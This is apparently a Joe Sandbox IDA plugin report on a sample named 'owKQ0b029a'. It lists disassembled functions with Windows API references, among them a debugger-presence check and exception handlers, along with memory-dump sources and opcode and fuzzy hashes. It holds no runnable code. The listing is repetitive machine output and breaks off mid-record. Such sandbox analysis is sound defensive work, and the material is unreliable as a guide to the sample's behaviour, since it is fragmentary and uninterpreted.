Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 3227067027-1840816070
Opcode ID: 81714a02d2f2af1978c299c1030adbccb2b33887b428f34efc14b2612a440402
Instruction ID: ab6eacdc69e709e22bd95a1b86cbf0ceec08940a2ca470109d672809265cc191
Opcode Fuzzy Hash: 81714a02d2f2af1978c299c1030adbccb2b33887b428f34efc14b2612a440402
Instruction Fuzzy Hash: B2919372248348BBE621DBA0DC89FFF77ECEB49704F04882EF649D6081D675A6059762

Function 00C8F14E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C8F294

Strings

1#INF, xrefs: 00C904A1
1#QNAN, xrefs: 00C9049A
1#IND, xrefs: 00C9048C
1#SNAN, xrefs: 00C90493

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 713c36ed90bbef6c4bcc74d52d4a15bd82ada25414861e54520432d55bf8e7ab
Instruction ID: 694f64c569d17d7276155bd680e2678956269faa92034c93025a72c26ce9c636
Opcode Fuzzy Hash: 713c36ed90bbef6c4bcc74d52d4a15bd82ada25414861e54520432d55bf8e7ab
Instruction Fuzzy Hash: 79C24A71E086288FDF25DE28DD447EAB3B5EB45309F2441EAD85DE7240E774AE828F44

Function 00C8A957 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C8AA4F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C8AA59
UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00C8AA66

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 317333cbe3c5e5ec8c7649827bbbbed74120cb0eac8d92474c08973736d6b613
Instruction ID: f4941e4b1f120a33ecf690d3c632cd08688ae61317998028d308e14bf8fd9b19
Opcode Fuzzy Hash: 317333cbe3c5e5ec8c7649827bbbbed74120cb0eac8d92474c08973736d6b613
Instruction Fuzzy Hash: AA31D6749012289BCB21EF64D9897DDBBB8AF08310F5041DAE41CA7251EB709F859F59

Function 00C8CBE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00C8CD77

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 96317c8c0e7f5aebd19519e274af0133e666bc8a5766e037e182c46a032eeb4f
Instruction ID: a150cbfeb73cdf7f9c8f74785c3d389ed401d2472c468b71c564c919e89ca4d0
Opcode Fuzzy Hash: 96317c8c0e7f5aebd19519e274af0133e666bc8a5766e037e182c46a032eeb4f
Instruction Fuzzy Hash: B5312671900209AFCB24AE78DCC5EFA7BBDDB85318F1401ADF828D7251E6309E458B64

Function 00C8ECA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd316f42ad27c60552b3d895631bf66d45d4f378006048057a551e9d46a1f216
Instruction ID: 94844f2b3528ee99abf60838e009d537aa19775a6b33d600f79cc7b7e1297d34
Opcode Fuzzy Hash: dd316f42ad27c60552b3d895631bf66d45d4f378006048057a551e9d46a1f216
Instruction Fuzzy Hash: 63021D71E001199FDF14DFA9C8806ADB7F1EF88314F25816AD929E7345D731AE42CB94

Function 00C7E1A3 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7E1C9
GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9F044,?,?), ref: 00C7E218

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: dbb73f92e1c67cd092a1609e7697938970d7f5b5d3225c1b9f150b286c44e789
Instruction ID: 56e8702504e3c27cb95b80058a9d706239813af7030e2c5de333a83097b8b82a
Opcode Fuzzy Hash: dbb73f92e1c67cd092a1609e7697938970d7f5b5d3225c1b9f150b286c44e789
Instruction Fuzzy Hash: 6C017175500248ABDB10CFA5DC09F9E77BCEF09710F105026FA08D7151D3709915C7A5

Function 00C93754 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C9374F,?,?,00000008,?,?,00C933EF,00000000), ref: 00C93981

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 690f3b8299bc86e51b5c70a84e87bf29f20df3ccfce8b5e324ac7668c148c7b9
Instruction ID: e2cbf07e0f54a695aec500eb2ae33aae35b9902383a20464836ab89ed7e3584f
Opcode Fuzzy Hash: 690f3b8299bc86e51b5c70a84e87bf29f20df3ccfce8b5e324ac7668c148c7b9
Instruction Fuzzy Hash: B4B16A716106489FDB15CF28C48AB647BE0FF05364F298659E8AACF2E1C735EA81CB44

Function 00C7A23C Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

, xrefs: 00C7A3B3

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 69d249e487dac91c1f654f6aaedb1587c08a9166b9302af1e3242a3c8d750b50
Instruction ID: 4acf91bba31f7f904a3a39cc1ff77bc542b1a6ba2d447dc3731617f14e792a79
Opcode Fuzzy Hash: 69d249e487dac91c1f654f6aaedb1587c08a9166b9302af1e3242a3c8d750b50
Instruction Fuzzy Hash: A8F1BE71808756CBC714DF25CC8472EB7A2BBC4324F158B29F8AA972E0D7719E469B43

Function 00C729F2 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00C72A17

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 24bbddd1e693aeb41ea2c948bc3f0597100a652cfbf8c42286081a1849ddf536
Instruction ID: 8c78418a898920f53d0cba0633885b1009e4900b056fc5a361ffa1008a657ede
Opcode Fuzzy Hash: 24bbddd1e693aeb41ea2c948bc3f0597100a652cfbf8c42286081a1849ddf536
Instruction Fuzzy Hash: C0F03AB4A01208CBCB38CB19ED457ED73B5F755324F1442A9D92A93750D770AE41EE91

Function 00C827A3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000127AF,00C82316), ref: 00C827A8

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3499bb2f34be7bd10d6dc380806cf0da2307f83ea8d4b75da6084e3ccbee2d3e
Instruction ID: 3c83f1716a1d385980a935b281940d25d3b63a501c07131162d71fdd4cff5273
Opcode Fuzzy Hash: 3499bb2f34be7bd10d6dc380806cf0da2307f83ea8d4b75da6084e3ccbee2d3e
Instruction Fuzzy Hash:

Function 00C8D895 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00C8D895

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 872a5e6246b9e36cff0fdd839a56a85fb8b659b0f65cb61eb6331a4d788444ae
Instruction ID: a93373c8bdf1b5223ba5d7418fc34ffd65bbca9447fa78703a296311084bb90b
Opcode Fuzzy Hash: 872a5e6246b9e36cff0fdd839a56a85fb8b659b0f65cb61eb6331a4d788444ae
Instruction Fuzzy Hash: 0EA02230203200EF83008F30AFBC32C3BE8AA802C0B0C002BA802C2030EB308080BB00

Function 00C74DD1 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7cb35a49ac0746d3c7e692e9b68577669955e11015c63b0de509be97ddef76
Instruction ID: c481d985d9a4dd5b72e973bf051457b14341fd8719c9934a057249447c19e128
Opcode Fuzzy Hash: db7cb35a49ac0746d3c7e692e9b68577669955e11015c63b0de509be97ddef76
Instruction Fuzzy Hash: D65259B26087019FC758CF19C891A6AF7E1FFC8304F89892DF99687255D734E919CB82

Function 00C846CD Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 016ca3e89da11001fa2b0f2d0ccd5586ed4fb97865f85ebeb38abba59f8f9b10
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: C5C171362091A309EB2D567A943443FBFE15AA27B531A076DE4B3CF1C4FE20D624D724

Function 00C84B02 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 520b2631d209f69468757ae4fd21087463b58538147257e28e3f6a3b820d33e5
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 6DC173322090930AEB2D567AD47453FFFE15AA27B531A076DE4B2CB1D4FE20D624D724

Function 00C84298 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: fb4c19ca3bd2e77bbb369f18ff291cb895e84de96d7e4b5cc3f8900f399e020d
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: B5C174322091930AEF2D567A943453FFFE15AA27B531A076DE4B2CB1D4FE20D624D724

Function 00C83E80 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 2fc489ef1f5aacde016c746cdea68130c7238835955528091f51b4491e1921e8
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 63C1913220919309EF2D567A843443FBFE15AA27B931A17ADE4B2CB1C4FE20D7649764

Function 00C7445B Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e6401fc2c3d06303e4a31124247a3835b4b27759ef24f269c77f10eea1559a
Instruction ID: 420fa0a2c097fde73a6e9026578c18be5a389ca90a7f36ef56dd948f5ace172a
Opcode Fuzzy Hash: 77e6401fc2c3d06303e4a31124247a3835b4b27759ef24f269c77f10eea1559a
Instruction Fuzzy Hash: 83D16C745183C49FC708CF19E8A0A2ABBF1AB8B318B488A5EF5D5D7352C335E615DB21

Function 00C877E0 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa15c894a1d54d655c8354ffd37a08a97fa9d97d75a1e01c0f90924a553c39a
Instruction ID: 083aaa475d15b5230dbc156fdb08c73744dd042c9e2b8275b76476645f102f2b
Opcode Fuzzy Hash: 3fa15c894a1d54d655c8354ffd37a08a97fa9d97d75a1e01c0f90924a553c39a
Instruction Fuzzy Hash: 8F61783160C70966DA387A288899BBE6395DF0130CF34071DE862EB2D1F651DF82E35E

Function 00C74049 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a4ca98beb43dd7d4c0ed1ba7b4c761d77eb4fca75d4a1c96a678dbb3d8c80d
Instruction ID: 507bfeca3a1216a029d49baf52fbb9a2e29e03cbb194f067398a7c80f3618438
Opcode Fuzzy Hash: 99a4ca98beb43dd7d4c0ed1ba7b4c761d77eb4fca75d4a1c96a678dbb3d8c80d
Instruction Fuzzy Hash: C181A2851192E87EC70A8F3D38A43ED3EE15777349B1D80BAD9C9C72A3C1764698D721

Function 00C749DC Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7412bc839d6944f15cc8075484d7ae75a8fd07efc3fc1e309ca9a3bd4677f05c
Instruction ID: 0254dca1fe534adf1c576338c0c115e60f0290e06a668d8ea1f38a14f9044f85
Opcode Fuzzy Hash: 7412bc839d6944f15cc8075484d7ae75a8fd07efc3fc1e309ca9a3bd4677f05c
